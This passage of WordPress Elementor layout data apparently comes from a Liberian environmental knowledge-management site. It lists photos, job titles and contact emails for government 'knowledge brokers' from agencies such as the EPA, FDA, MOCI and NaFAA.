questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental 